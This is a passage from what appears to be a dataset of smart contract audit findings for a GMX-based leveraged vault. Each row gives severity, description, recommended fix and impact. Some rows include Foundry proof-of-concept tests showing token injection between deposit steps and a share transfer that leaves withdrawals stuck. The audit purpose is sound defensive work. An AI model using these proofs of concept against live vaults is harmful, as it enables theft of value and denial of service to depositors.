This is established in the `GMXDeposit.deposit` function, where `self.refundee` is assigned to `msg.sender`.\\n```\\nfunction deposit(GMXTypes.Store storage self, GMXTypes.DepositParams memory dp, bool isNative) external {\\n // Sweep any tokenA/B in vault to the temporary trove for future compouding and to prevent\\n // it from being considered as part of depositor's assets\\n if (self.tokenA.balanceOf(address(this)) > 0) {\\n self.tokenA.safeTransfer(self.trove, self.tokenA.balanceOf(address(this)));\\n }\\n if (self.tokenB.balanceOf(address(this)) > 0) {\\n self.tokenB.safeTransfer(self.trove, self.tokenB.balanceOf(address(this)));\\n }\\n\\n self.refundee = payable(msg.sender);\\n\\n // rest of code\\n\\n _dc.depositKey = GMXManager.addLiquidity(self, _alp);\\n\\n self.depositCache = _dc;\\n\\n emit DepositCreated(_dc.user, _dc.depositParams.token, _dc.depositParams.amt);\\n }\\n```\\n\\nIf the deposit passes the GMX checks, the `afterDepositExecution` callback is triggered, leading to `vault.processDeposit()` to check the vault's health. A failure here updates the status to `GMXTypes.Status.Deposit_Failed`. The reversal process is then handled by the `processDepositFailure` function, which can only be called by keepers. 
They pay for the transaction's gas costs, including the execution fee.\\n```\\nfunction processDepositFailure(uint256 slippage, uint256 executionFee) external payable onlyKeeper {\\n GMXDeposit.processDepositFailure(_store, slippage, executionFee);\\n }\\n```\\n\\nIn `GMXDeposit.processDepositFailure`, `self.refundee` is not updated, resulting in any excess execution fees being incorrectly sent to the initial depositor, although the keeper paid for it.\\n```\\nfunction processDepositFailure(GMXTypes.Store storage self, uint256 slippage, uint256 executionFee) external {\\n GMXChecks.beforeProcessAfterDepositFailureChecks(self);\\n\\n GMXTypes.RemoveLiquidityParams memory _rlp;\\n\\n // If current LP amount is somehow less or equal to amount before, we do not remove any liquidity\\n if (GMXReader.lpAmt(self) <= self.depositCache.healthParams.lpAmtBefore) {\\n processDepositFailureLiquidityWithdrawal(self);\\n } else {\\n // Remove only the newly added LP amount\\n _rlp.lpAmt = GMXReader.lpAmt(self) - self.depositCache.healthParams.lpAmtBefore;\\n\\n // If delta strategy is Long, remove all in tokenB to make it more\\n // efficent to repay tokenB debt as Long strategy only borrows tokenB\\n if (self.delta == GMXTypes.Delta.Long) {\\n address[] memory _tokenASwapPath = new address[](1);\\n _tokenASwapPath[0] = address(self.lpToken);\\n _rlp.tokenASwapPath = _tokenASwapPath;\\n\\n (_rlp.minTokenAAmt, _rlp.minTokenBAmt) = GMXManager.calcMinTokensSlippageAmt(\\n self, _rlp.lpAmt, address(self.tokenB), address(self.tokenB), slippage\\n );\\n } else {\\n (_rlp.minTokenAAmt, _rlp.minTokenBAmt) = GMXManager.calcMinTokensSlippageAmt(\\n self, _rlp.lpAmt, address(self.tokenA), address(self.tokenB), slippage\\n );\\n }\\n\\n _rlp.executionFee = executionFee;\\n\\n // Remove liqudity\\n self.depositCache.withdrawKey = GMXManager.removeLiquidity(self, _rlp);\\n }\\n```\\n\\nThe same issue occurs in the `processWithdrawFailure` function where the excess fees will be sent to the 
initial user who called withdraw instead of the keeper.","The `processDepositFailure` and `processWithdrawFailure` functions must be modified to update `self.refundee` to the current executor of the function, which, in the case of deposit or withdraw failure, is the keeper.\\n```\\nfunction processDepositFailure(GMXTypes.Store storage self, uint256 slippage, uint256 executionFee) external {\\n GMXChecks.beforeProcessAfterDepositFailureChecks(self);\\n\\n GMXTypes.RemoveLiquidityParams memory _rlp;\\n\\n self.refundee = payable(msg.sender);\\n\\n // rest of code\\n }\\n```\\n\\n```\\nfunction processWithdrawFailure(\\n GMXTypes.Store storage self,\\n uint256 slippage,\\n uint256 executionFee\\n ) external {\\n GMXChecks.beforeProcessAfterWithdrawFailureChecks(self);\\n\\n self.refundee = payable(msg.sender);\\n\\n // rest of code\\n }\\n```\\n","This flaw causes a loss of funds for the keepers, negatively impacting the vaults. Users also inadvertently receive extra fees that are rightfully owed to the keepers","```\\nfunction deposit(GMXTypes.DepositParams memory dp) external payable nonReentrant {\\n GMXDeposit.deposit(_store, dp, false);\\n }\\n\\nstruct DepositParams {\\n // Address of token depositing; can be tokenA, tokenB or lpToken\\n address token;\\n // Amount of token to deposit in token decimals\\n uint256 amt;\\n // Minimum amount of shares to receive in 1e18\\n uint256 minSharesAmt;\\n // Slippage tolerance for adding liquidity; e.g. 3 = 0.03%\\n uint256 slippage;\\n // Execution fee sent to GMX for adding liquidity\\n uint256 executionFee;\\n }\\n```\\n" +Users withdraw more assets than should when `mintFee` was called long ago,high,"The amount of LP-tokens to withdraw is calculated at the `GMXWithdraw.withdraw` before the `mintFee` function is called. The `mintFee` function increases the `totalSupply` amount. This way users receive more tokens than should be at the current timestamp. 
The longer the period since the last `mintFee` was called the more excess tokens the user receives.\\nThe protocol mints vault token shares as management fees to protocol treasury with the `mintFee` function. This increases the `totalSupply` of the shares. The amount of minted fees depends on the time since the last `mintFee` call.\\n```\\n function mintFee() public {\\n _mint(_store.treasury, GMXReader.pendingFee(_store));\\n _store.lastFeeCollected = block.timestamp;\\n }\\n```\\n\\nWhile withdrawal amount of LP-token can be calculated with outdated totalSupply:\\n```\\n67 _wc.shareRatio = wp.shareAmt\\n68 * SAFE_MULTIPLIER\\n69 / IERC20(address(self.vault)).totalSupply();\\n70 _wc.lpAmt = _wc.shareRatio\\n71 * GMXReader.lpAmt(self)\\n72 / SAFE_MULTIPLIER;\\n\\n101 self.vault.mintFee();\\n```\\n\\nThe `mintFee` is called only after this calculation.",Users withdraw more assets than should when `mintFee` was called long ago\\nConsider calling the `mintFee` before the `_wc.shareRatio` calculation.,Users can receive excess amounts of tokens during withdrawal. Other users and the protocol management lose value of their shares.\\nTools used\\nManual Review,"```\\n function mintFee() public {\\n _mint(_store.treasury, GMXReader.pendingFee(_store));\\n _store.lastFeeCollected = block.timestamp;\\n }\\n```\\n" +Inaccurate Fee Due to missing lastFeeCollected Update Before feePerSecond Modification,medium,"The protocol charges a management fee based on the `feePerSecond` variable, which dictates the rate at which new vault tokens are minted as fees via the `mintFee` function. An administrative function `updateFeePerSecond` allows the owner to alter this fee rate. However, the current implementation does not account for accrued fees before the update, potentially leading to incorrect fee calculation.\\nThe contract's logic fails to account for outstanding fees at the old rate prior to updating the `feePerSecond`. 
As it stands, the `updateFeePerSecond` function changes the fee rate without triggering a `mintFee`, which would update the `lastFeeCollected` timestamp and mint the correct amount of fees owed up until that point.\\n```\\nfunction updateFeePerSecond(uint256 feePerSecond) external onlyOwner {\\n _store.feePerSecond = feePerSecond;\\n emit FeePerSecondUpdated(feePerSecond);\\n }\\n```\\n\\nScenario Illustration:\\nUser A deposits, triggering `mintFee` and setting `lastFeeCollected` to the current `block.timestamp`.\\nAfter two hours without transactions, no additional `mintFee` calls occur.\\nThe owner invokes `updateFeePerSecond` to increase the fee by 10%.\\nUser B deposits, and `mintFee` now calculates fees since `lastFeeCollected` using the new, higher rate, incorrectly applying it to the period before the rate change.",Inaccurate Fee Due to missing lastFeeCollected Update Before feePerSecond Modification\\nEnsure the fees are accurately accounted for at their respective rates by updating `lastFeeCollected` to the current timestamp prior to altering the `feePerSecond`. This can be achieved by invoking `mintFee` within the `updateFeePerSecond` function to settle all pending fees first:\\n```\\nfunction updateFeePerSecond(uint256 feePerSecond) external onlyOwner {\\n self.vault.mintFee();\\n _store.feePerSecond = feePerSecond;\\n emit FeePerSecondUpdated(feePerSecond);\\n }\\n```\\n,The impact is twofold:\\nAn increased `feePerSecond` results in excessively high fees charged for the period before the update.\\nA decreased `feePerSecond` leads to lower-than-expected fees for the same duration.,```\\nfunction updateFeePerSecond(uint256 feePerSecond) external onlyOwner {\\n _store.feePerSecond = feePerSecond;\\n emit FeePerSecondUpdated(feePerSecond);\\n }\\n```\\n +Token injection leads to unintended behavior of vault,medium,"When a token is deposited/withdrawn in a vault, it happens in two steps. 
In the first step, some states of the vault are saved, which are partially important for the second step, and a request to deposit/withdraw is made to GMX. In the second step, GMX calls the callback function, and the vault completes the deposit/withdrawal. The problem is that one can send LP tokens to the contract between these two steps, causing the vault to behave unintentionally.\\nDeposit\\nHere is a PoC for the effects when sending lpTokens between the two steps during deposit:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.21;\\nimport { console, console2 } from ""forge-std/Test.sol"";\\nimport { TestUtils } from ""../../helpers/TestUtils.sol"";\\nimport { IERC20 } from ""@openzeppelin/contracts/token/ERC20/IERC20.sol"";\\nimport { GMXMockVaultSetup } from ""./GMXMockVaultSetup.t.sol"";\\nimport { GMXTypes } from ""../../../contracts/strategy/gmx/GMXTypes.sol"";\\nimport { GMXTestHelper } from ""./GMXTestHelper.sol"";\\n\\nimport { IDeposit } from ""../../../contracts/interfaces/protocols/gmx/IDeposit.sol"";\\nimport { IEvent } from ""../../../contracts/interfaces/protocols/gmx/IEvent.sol"";\\n\\ncontract GMXDepositTest is GMXMockVaultSetup, GMXTestHelper, TestUtils {\\n function test_POC2() public {\\n uint256 lpAmtUser1 = 0.000005e18; //~400$ (because price of lpToken = 79990000$)\\n\\n //In the setup, the owner receives a few lpTokens, which are now sent to user1 for testing the token injection\\n vm.startPrank(owner);\\n IERC20(address(WETHUSDCpair)).transfer(address(user1), lpAmtUser1);\\n vm.stopPrank();\\n \\n //Owner deposits in Vault\\n vm.startPrank(owner);\\n _createDeposit(address(WETH), 10 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n\\n //Variable for Assertion\\n (,uint256 debtAmtTokenBBefore) = vault.debtAmt();\\n\\n vm.startPrank(user1);\\n _createDeposit(address(WETH), 0.1 ether, 0, SLIPPAGE, EXECUTION_FEE); 
//User1 creates deposit. The 0.1 ether is being leveraged\\n IERC20(address(WETHUSDCpair)).transfer(address(vault), lpAmtUser1); //User1 injects lp-tokens between createDeposit and processDeposit. They are not leveraged\\n vm.stopPrank();\\n //In step one, the equity was saved before the deposit. The equity depends on the LP amount and the debts to the lending Vaults. In step two, \\n //the saved equity is used alongside the current equity to calculate how many Vault shares a user receives. This way, user1 receives shares \\n //for their injected tokens that do not have any leverage.(so no borrowing from the lending vaults was done for these tokens)\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n \\n //User1 withdraws all his tokens.\\n uint256 vaultSharesAmount = IERC20(address(vault)).balanceOf(user1);\\n vm.startPrank(user1);\\n //In the case of a withdrawal, the debts to the LendingVaults are also repaid. Since it is assumed that all tokens have been leveraged, there \\n //is a mistaken repayment to the lending vaults for the injected tokens as well.\\n _createAndExecuteWithdrawal(address(WETH), address(USDC), address(USDC), vaultSharesAmount, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n\\n //Variable for Assertion\\n (,uint256 debtAmtTokenBAfter) = vault.debtAmt();\\n \\n //After User1 withdrew their LP tokens, the debt amount for TokenB would normally be approximately the same as it was before User1 deposited. \\n //However, due to the unleveraged tokens, more debt was repaid, resulting in a lower debt and, consequently, lower leverage than before.\\n assert(debtAmtTokenBBefore - 750e6 > debtAmtTokenBAfter); //750e6 == $750. 
This is to show that the debt is significantly less than before\\n\\n console.log(""debtAmtTokenBBefore: %s"", debtAmtTokenBBefore);\\n console.log(""debtAmtTokenBAfter: %s"", debtAmtTokenBAfter);\\n }\\n}\\n```\\n\\nSince the user can withdraw their injected tokens, which they received VaultShares for, they could execute this action multiple times to further worsen the tokenB debt amount and, consequently, the leverage.\\nThe POC can be started with this command: `forge test --match-test test_POC2 -vv`\\nWithdraw\\nWhen withdrawing, LP tokens can also be injected between the two steps. This can be exploited by an attacker because he can fail the afterWithdrawChecks if he sends the same amount of lp tokens that a user wants to withdraw.\\nHere is the check that the attacker could exploit by sending enough tokens to make the lpAmt as large as it was before the withdrawal:\\n```\\nFile: GMXChecks.sol#afterWithdrawChecks\\nif (GMXReader.lpAmt(self) >= self.withdrawCache.healthParams.lpAmtBefore)\\n revert Errors.InsufficientLPTokensBurned();\\n```\\n","In the deposit function, the depositValue should be used to determine approximately how many lpTokens GMX will be transferred to the vault. 
This number should then be compared to the actual received amount in processDeposit.\\nIn the case of withdrawal, after calling removeLiquidity, the lpAmt should be stored, and this should be compared to the lpAmt in the processWithdraw function to determine whether tokens were injected.","Since, if this bug is exploited during deposit, an attacker can decrease the leverage, it results in users of the vault having less leverage and lower yield.\\nWhen withdrawing, the attacker can potentially cause the withdrawal to fail, but the user doesn't lose anything and can try again.","```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.21;\\nimport { console, console2 } from ""forge-std/Test.sol"";\\nimport { TestUtils } from ""../../helpers/TestUtils.sol"";\\nimport { IERC20 } from ""@openzeppelin/contracts/token/ERC20/IERC20.sol"";\\nimport { GMXMockVaultSetup } from ""./GMXMockVaultSetup.t.sol"";\\nimport { GMXTypes } from ""../../../contracts/strategy/gmx/GMXTypes.sol"";\\nimport { GMXTestHelper } from ""./GMXTestHelper.sol"";\\n\\nimport { IDeposit } from ""../../../contracts/interfaces/protocols/gmx/IDeposit.sol"";\\nimport { IEvent } from ""../../../contracts/interfaces/protocols/gmx/IEvent.sol"";\\n\\ncontract GMXDepositTest is GMXMockVaultSetup, GMXTestHelper, TestUtils {\\n function test_POC2() public {\\n uint256 lpAmtUser1 = 0.000005e18; //~400$ (because price of lpToken = 79990000$)\\n\\n //In the setup, the owner receives a few lpTokens, which are now sent to user1 for testing the token injection\\n vm.startPrank(owner);\\n IERC20(address(WETHUSDCpair)).transfer(address(user1), lpAmtUser1);\\n vm.stopPrank();\\n \\n //Owner deposits in Vault\\n vm.startPrank(owner);\\n _createDeposit(address(WETH), 10 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n\\n //Variable for Assertion\\n (,uint256 debtAmtTokenBBefore) = vault.debtAmt();\\n\\n 
vm.startPrank(user1);\\n _createDeposit(address(WETH), 0.1 ether, 0, SLIPPAGE, EXECUTION_FEE); //User1 creates deposit. The 0.1 ether is being leveraged\\n IERC20(address(WETHUSDCpair)).transfer(address(vault), lpAmtUser1); //User1 injects lp-tokens between createDeposit and processDeposit. They are not leveraged\\n vm.stopPrank();\\n //In step one, the equity was saved before the deposit. The equity depends on the LP amount and the debts to the lending Vaults. In step two, \\n //the saved equity is used alongside the current equity to calculate how many Vault shares a user receives. This way, user1 receives shares \\n //for their injected tokens that do not have any leverage.(so no borrowing from the lending vaults was done for these tokens)\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n \\n //User1 withdraws all his tokens.\\n uint256 vaultSharesAmount = IERC20(address(vault)).balanceOf(user1);\\n vm.startPrank(user1);\\n //In the case of a withdrawal, the debts to the LendingVaults are also repaid. Since it is assumed that all tokens have been leveraged, there \\n //is a mistaken repayment to the lending vaults for the injected tokens as well.\\n _createAndExecuteWithdrawal(address(WETH), address(USDC), address(USDC), vaultSharesAmount, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n\\n //Variable for Assertion\\n (,uint256 debtAmtTokenBAfter) = vault.debtAmt();\\n \\n //After User1 withdrew their LP tokens, the debt amount for TokenB would normally be approximately the same as it was before User1 deposited. \\n //However, due to the unleveraged tokens, more debt was repaid, resulting in a lower debt and, consequently, lower leverage than before.\\n assert(debtAmtTokenBBefore - 750e6 > debtAmtTokenBAfter); //750e6 == $750. 
This is to show that the debt is significantly less than before\\n\\n console.log(""debtAmtTokenBBefore: %s"", debtAmtTokenBBefore);\\n console.log(""debtAmtTokenBAfter: %s"", debtAmtTokenBAfter);\\n }\\n}\\n```\\n" +User can revert processWithdraw,high,"When a user wants to withdraw his tokens after depositing, the LP tokens are first sent to GMX. GMX then sends back the deposited tokens. Before the user receives them, their Vault Shares are burned in processWithdraw:\\n```\\nFile: GMXWithdraw.sol#processWithdraw\\nself.vault.burn(self.withdrawCache.user, self.withdrawCache.withdrawParams.shareAmt);\\n```\\n\\nA user could, after the LP tokens have been transferred to GMX and the Vault is waiting for the callback, transfer his Vault Shares away from his address. This would result in not having enough tokens left during the burn, causing a revert. Afterward, the Vault would be stuck in the 'Withdraw' state because, although the keeper could call the function again, it would result in revert again.\\nHere is a POC that demonstrates how a user can cause the processWithdraw to revert:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.21;\\nimport { console, console2 } from ""forge-std/Test.sol"";\\nimport { TestUtils } from ""../../helpers/TestUtils.sol"";\\nimport { IERC20 } from ""@openzeppelin/contracts/token/ERC20/IERC20.sol"";\\nimport { IERC20Errors } from ""@openzeppelin/contracts/interfaces/draft-IERC6093.sol"";\\nimport { GMXMockVaultSetup } from ""./GMXMockVaultSetup.t.sol"";\\nimport { GMXTypes } from ""../../../contracts/strategy/gmx/GMXTypes.sol"";\\nimport { GMXTestHelper } from ""./GMXTestHelper.sol"";\\n\\nimport { IDeposit } from ""../../../contracts/interfaces/protocols/gmx/IDeposit.sol"";\\nimport { IEvent } from ""../../../contracts/interfaces/protocols/gmx/IEvent.sol"";\\nimport { Attacker } from ""./Attacker.sol"";\\n\\ncontract GMXDepositTest is GMXMockVaultSetup, GMXTestHelper, TestUtils {\\n function test_POC4() public {\\n //owner 
deposits\\n vm.startPrank(address(owner));\\n _createAndExecuteDeposit(address(WETH), address(USDC), address(WETH), 10 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n\\n //user1 deposits\\n vm.startPrank(address(user1));\\n _createAndExecuteDeposit(address(WETH), address(USDC), address(WETH), 10 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n \\n uint256 vaultSharesAmt = IERC20(address(vault)).balanceOf(address(user1)); //Vault Shares from user1 to withdraw\\n vm.startPrank(address(user1));\\n _createWithdrawal(address(USDC), vaultSharesAmt, 0, SLIPPAGE, EXECUTION_FEE); //User 1 creates a withdrawal\\n IERC20(address(vault)).transfer(address(user2), vaultSharesAmt); //Before processWithdraw is executed and the user's Vault Shares are burned, he sends them away\\n\\n vm.expectRevert(\\n abi.encodeWithSelector(IERC20Errors.ERC20InsufficientBalance.selector, address(user1), 0, vaultSharesAmt)\\n );\\n mockExchangeRouter.executeWithdrawal(address(WETH), address(USDC), address(vault), address(callback)); //executeWithdraw reverted as there are no tokens to burn\\n vm.stopPrank();\\n\\n GMXTypes.Store memory _store = vault.store();\\n assert(uint256(_store.status) == uint256(GMXTypes.Status.Withdraw)); //shows that the vault is still in the Withdraw status\\n }\\n}\\n```\\n\\nThe POC can be started with this command: `forge test --match-test test_POC4 -vv`","Tokens should be burned immediately after remove liquidity is called in GMXWithdraw.sol:\\n```\\n// Add the line below\\n 154: self.vault.burn(self.withdrawCache.user, self.withdrawCache.withdrawParams.shareAmt);\\n// Remove the line below\\n 197: self.vault.burn(self.withdrawCache.user, self.withdrawCache.withdrawParams.shareAmt);\\n```\\n","A user could put the Vault into a 'Stuck' state that can only be exited through 'emergencyPause' and 'emergencyResume.' This would take some time as 'emergencyResume' can only be called by the owner, who is a Multisig with a Timelock. 
(A keeper could also call 'processWithdrawCancellation,' but in this case, the debt to the lending vault would not be repaid. The tokens withdrawn by GMX would simply remain in the vault, and the user's Vault Shares would not be burned.)","```\\nFile: GMXWithdraw.sol#processWithdraw\\nself.vault.burn(self.withdrawCache.user, self.withdrawCache.withdrawParams.shareAmt);\\n```\\n" +Incorrect slippage protection on deposits,high,"The slippage on deposits is enforced by the `minMarketTokenAmt` parameter. But in the calculation of `minMarketTokenAmt`, the slippage is factored on the user's deposit value and not the leveraged amount which is actually being deposited to GMX.\\n```\\n function deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n ) external {\\n \\n // rest of code// rest of code. more code \\n\\n if (dp.token == address(self.lpToken)) {\\n // If LP token deposited\\n _dc.depositValue = self.gmxOracle.getLpTokenValue(\\n address(self.lpToken),\\n address(self.tokenA),\\n address(self.tokenA),\\n address(self.tokenB),\\n false,\\n false\\n )\\n * dp.amt\\n / SAFE_MULTIPLIER;\\n } else {\\n // If tokenA or tokenB deposited\\n _dc.depositValue = GMXReader.convertToUsdValue(\\n self,\\n address(dp.token),\\n dp.amt\\n );\\n }\\n \\n // rest of code// rest of code. 
more code\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n _alp.minMarketTokenAmt = GMXManager.calcMinMarketSlippageAmt(\\n self,\\n _dc.depositValue,\\n dp.slippage\\n );\\n _alp.executionFee = dp.executionFee;\\n\\n\\n _dc.depositKey = GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n```\\n\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/0f909e2f0917cb9ad02986f631d622376510abec/contracts/strategy/gmx/GMXDeposit.sol#L54-L146\\nBut vaults with leverage greater than 1 will be adding more than `_dc.depositValue` worth of liquidity in which case the calculated `minMarketTokenAmt` will result in a much higher slippage.\\nExample Scenario\\nThe vault is a 3x leveraged vault\\nUser deposits 1 usd worth tokenA and sets slippage to 1%.\\nThe `minMarketTokenAmt` calculated is worth 0.99 usd\\nThe actual deposit added is worth 3 usd due to leverage\\nThe deposit receives 2.90 worth of LP token which is more than 1% slippage","Use the actual deposit value instead of the user's initial deposit value when calculating the `minMarketTokenAmt`\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/contracts/strategy/gmx/GMXDeposit.sol b/contracts/strategy/gmx/GMXDeposit.sol\\nindex 1b28c3b..aeba68b 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/contracts/strategy/gmx/GMXDeposit.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/contracts/strategy/gmx/GMXDeposit.sol\\n@@ // Remove the line below\\n135,7 // Add the line below\\n135,15 @@ library GMXDeposit {\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n _alp.minMarketTokenAmt = GMXManager.calcMinMarketSlippageAmt(\\n self,\\n// Remove the line below\\n _dc.depositValue,\\n// Add the line below\\n GMXReader.convertToUsdValue(\\n// Add the line below\\n self,\\n// Add the line below\\n address(self.tokenA),\\n// Add the line below\\n _alp.tokenAAmt\\n// 
Add the line below\\n ) // Add the line below\\n GMXReader.convertToUsdValue(\\n// Add the line below\\n self,\\n// Add the line below\\n address(self.tokenB),\\n// Add the line below\\n _alp.tokenBAmt\\n// Add the line below\\n ),\\n dp.slippage\\n );\\n _alp.executionFee = dp.executionFee;\\n```\\n",Depositors can loose value,"```\\n function deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n ) external {\\n \\n // rest of code// rest of code. more code \\n\\n if (dp.token == address(self.lpToken)) {\\n // If LP token deposited\\n _dc.depositValue = self.gmxOracle.getLpTokenValue(\\n address(self.lpToken),\\n address(self.tokenA),\\n address(self.tokenA),\\n address(self.tokenB),\\n false,\\n false\\n )\\n * dp.amt\\n / SAFE_MULTIPLIER;\\n } else {\\n // If tokenA or tokenB deposited\\n _dc.depositValue = GMXReader.convertToUsdValue(\\n self,\\n address(dp.token),\\n dp.amt\\n );\\n }\\n \\n // rest of code// rest of code. more code\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n _alp.minMarketTokenAmt = GMXManager.calcMinMarketSlippageAmt(\\n self,\\n _dc.depositValue,\\n dp.slippage\\n );\\n _alp.executionFee = dp.executionFee;\\n\\n\\n _dc.depositKey = GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n```\\n" +incorrect handling for deposit failure leads to stuck at `deposit_failed` status .,medium,"When a deposit fails, the contract can become stuck in a `deposit_failed` status due to improper handling of debt repayment by swapping through the `swapTokensForExactTokens()` function.which leads to gas losses for keeper attempting to handle that and puts user deposits at risk.\\nIn case of a user making a deposit to the `strategy`, it will create a deposit in `GMX`. 
After a successful deposit, `GMX` will call the callback function `afterDepositExecution`, and the callback function will call `processDeposit`.\\nIf the `processDeposit()` fails in the `try` call for any reason, the function will `catch` that and set the status to `deposit_failed`. An event will be emitted so the keeper can handle it.\\n```\\n function processDeposit(GMXTypes.Store storage self) external {\\n // some code ..\\n try GMXProcessDeposit.processDeposit(self) {\\n // ..more code\\n } catch (bytes memory reason) {\\n self.status = GMXTypes.Status.Deposit_Failed;\\n\\n emit DepositFailed(reason);\\n }\\n }\\n```\\n\\nThe keeper calls the function processDepositFailure(). This function initiates a `requestWithdraw` to `GMX` to remove the liquidity added by the user deposit (+ the borrowed amount).\\nAfter executing the `removeLiquidity`, the callback function `afterWithdrawalExecution` is triggered. and since the status is `deposit_failed`, it invokes the function `processDepositFailureLiquidityWithdrawal`.\\nIn `processDepositFailureLiquidityWithdrawal`, it first checks if a swap is necessary. If required, it swaps tokens to repay the debt.\\n```\\n (bool _swapNeeded, address _tokenFrom, address _tokenTo, uint256 _tokenToAmt) =\\n GMXManager.calcSwapForRepay(self, _rp);\\n\\n if (_swapNeeded) {\\n\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = _tokenFrom;\\n _sp.tokenOut = _tokenTo;\\n _sp.amountIn = IERC20(_tokenFrom).balanceOf(address(this));\\n _sp.amountOut = _tokenToAmt;\\n _sp.slippage = self.minSlippage;\\n _sp.deadline = block.timestamp;\\n GMXManager.swapTokensForExactTokens(self, _sp);\\n }\\n```\\n\\nThe problem arises if the swap revert if the `tokenIn` balance is insufficient to cover the `_amountOut` of `_tokenOut`, leading to a failed swap since the swap function is `swapTokensForExactTokens`. 
Consequently, the status remains `deposit_failed` and the callback revet.\\nNote: The swap can fail for various reasons.\\nIn this scenario, the keeper can only invoke the `processDepositFailure()` function again. During the second call, it directly triggers `processDepositFailureLiquidityWithdrawal` since the `lp` tokens for the failed deposit has already been withdrawn.\\n```\\n function processDepositFailure(GMXTypes.Store storage self, uint256 slippage, uint256 executionFee) external {\\n GMXChecks.beforeProcessAfterDepositFailureChecks(self);\\n\\n GMXTypes.RemoveLiquidityParams memory _rlp;\\n\\n // If current gmx LP amount is somehow less or equal to amount before, we do not remove any liquidity\\n if (GMXReader.lpAmt(self) <= self.depositCache.healthParams.lpAmtBefore) {\\n processDepositFailureLiquidityWithdrawal(self);\\n //// rest of code more code\\n }}\\n```\\n\\nThe swap will always revert because the contract's balance of `tokenIn` will never be sufficient to cover the `_amountOut` of `_tokenOut`. Consequently, the status remains stuck at `deposit_failed`.","Utilize `swapExactTokensForTokens` and swap the remaining tokens from `tokenIn` after substracting debt need to be repaid of this token.for `tokenOut`.\\nImplement safeguards to calculate the appropriate amount for swapping, avoiding potential reverting transactions. 
Here's an example of how to calculate the swap amount:\\n` if (rp.repayTokenAAmt > self.tokenA.balanceOf(address(this))) {\\n // If more tokenA is needed for repayment\\n if(rp.repayTokenBAmt < self.tokenB.balanceOf(address(this))){\\n _tokenToAmt = self.tokenB.balanceOf(address(this)) - rp.repayTokenBAmt;\\n _tokenFrom = address(self.tokenB);\\n _tokenTo = address(self.tokenA);\\n }\\n }`","The strategy remains stuck at the `deposit_failed` status, halting any further interactions with the protocol.\\nKeepers lose gas for each call to `processDepositFailure()`.\\nUsers may lose their deposits.",```\\n function processDeposit(GMXTypes.Store storage self) external {\\n // some code ..\\n try GMXProcessDeposit.processDeposit(self) {\\n // ..more code\\n } catch (bytes memory reason) {\\n self.status = GMXTypes.Status.Deposit_Failed;\\n\\n emit DepositFailed(reason);\\n }\\n }\\n```\\n +Missing fees allow cheap griefing attacks that lead to DoS,medium,"The protocol has chosen a design pattern which does not allow two users at the same time to interact with the system as every time a user deposits or withdraws funds a 2-step process begins which interacts with GMX and only after this process is closed, another user is allowed to start a new process. This design pattern can be abused as griefing attack by front running all user calls with a small deposit, or withdraw call, to DoS the user's call. 
As the protocol is deployed on L2 blockchains with low transaction fees and does not take fees on depositing or withdrawing funds, this DoS griefing attack is cheap and can be scaled to a point where nobody is able to interact with the system.\\nThe design pattern of the system which leads to this possibility is the status variable.\\nThe flow for such a griefing attack would look like the following:\\nThe system's status is Open\\nUser wants to deposit or withdraw and creates a transaction to do so\\nAttacker front runs the call of the user and deposit or withdraw a small amount of funds (Systems status changes to Deposit or Withdraw)\\nUser's call gets reverted as the check if the system's status is Open reverts\\nDeposit function calls beforeDepositChecks and updates the status to Deposit:\\n```\\nfunction deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n) external {\\n // rest of code\\n GMXChecks.beforeDepositChecks(self, _dc.depositValue);\\n\\n self.status = GMXTypes.Status.Deposit;\\n // rest of code\\n}\\n```\\n\\nThe beforeDepositChecks function reverts if the current status is not Open:\\n```\\nfunction beforeDepositChecks(\\n GMXTypes.Store storage self,\\n uint256 depositValue\\n) external view {\\n if (self.status != GMXTypes.Status.Open)\\n revert Errors.NotAllowedInCurrentVaultStatus();\\n // rest of code\\n}\\n```\\n\\nThe same pattern is implemented in the withdraw flow.","Implement fees, for depositing and withdrawing, to increase the costs of such a griefing attack, or rethink the status architecture.",DoS of the whole system for all depositors.,"```\\nfunction deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n) external {\\n // rest of code\\n GMXChecks.beforeDepositChecks(self, _dc.depositValue);\\n\\n self.status = GMXTypes.Status.Deposit;\\n // rest of code\\n}\\n```\\n" +Yield in trove is lost when closing a strategy vault,high,"The funds in the 
